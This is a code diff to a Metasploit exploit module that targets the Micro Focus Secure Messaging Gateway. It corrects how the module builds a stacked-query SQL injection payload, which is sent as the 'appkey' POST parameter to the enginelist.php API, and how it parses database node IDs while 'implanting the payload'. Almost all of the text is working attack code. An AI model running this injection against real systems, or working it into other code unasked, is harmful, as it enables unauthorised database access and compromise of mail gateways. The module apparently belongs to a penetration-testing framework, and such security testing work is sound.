Fixing r and sql variables use same object issue

modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb

@@ -62,20 +62,19 @@ class MetasploitModule < Msf::Exploit::Remote
     # but since we are able to use stacked-query approach, following form of payload is required in order to be able
     # get back the output of query !
     #
-    r = rand_text_alphanumeric(3 + rand(3))
-    sql = r
+    sql = rand_text_alphanumeric(3 + rand(3))
     sql << "') LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressPlain ON ScanEngineBindAddressPlain.idScanEngine=ScanEngineProperty.idScanEngine "
     sql << "LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressSsl ON ScanEngineBindAddressSsl.idScanEngine=ScanEngineProperty.idScanEngine "
     sql << "LEFT JOIN ScanEngineProperty AS ScanEngineEnableSsl ON ScanEngineEnableSsl.idScanEngine=ScanEngineProperty.idScanEngine; "
     sql << query
     sql << "; -- "
-    sql << r
+    sql << rand_text_alphanumeric(3 + rand(3))
 
     send_request_cgi(
       'method'  => 'POST',
       'uri'     =>  normalize_uri(target_uri.path, 'api', '1', 'enginelist.php'),
       'vars_post' => {
-        'appkey' => r
+        'appkey' => sql
       }
     )
 
@@ -129,8 +128,8 @@ class MetasploitModule < Msf::Exploit::Remote
     if res && res.code == 200 && res.body.include?('DbNodeId')
       # Defining as global variable since we need to access them later within clean up function.
       begin
-        @domainid  = JSON.parse(res.body)['Nodes'][0]['DbNodeId']
-        @dkimid  = JSON.parse(res.body)['Nodes'][1]['DbNodeId']
+        @domainid  = res.get_json_document['Nodes'][0]['DbNodeId']
+        @dkimid  = res.get_json_document['Nodes'][1]['DbNodeId']
       rescue => e
         fail_with Failure::UnexpectedReply, "Something went horribly wrong while implanting the payload : #{e.message}"
       end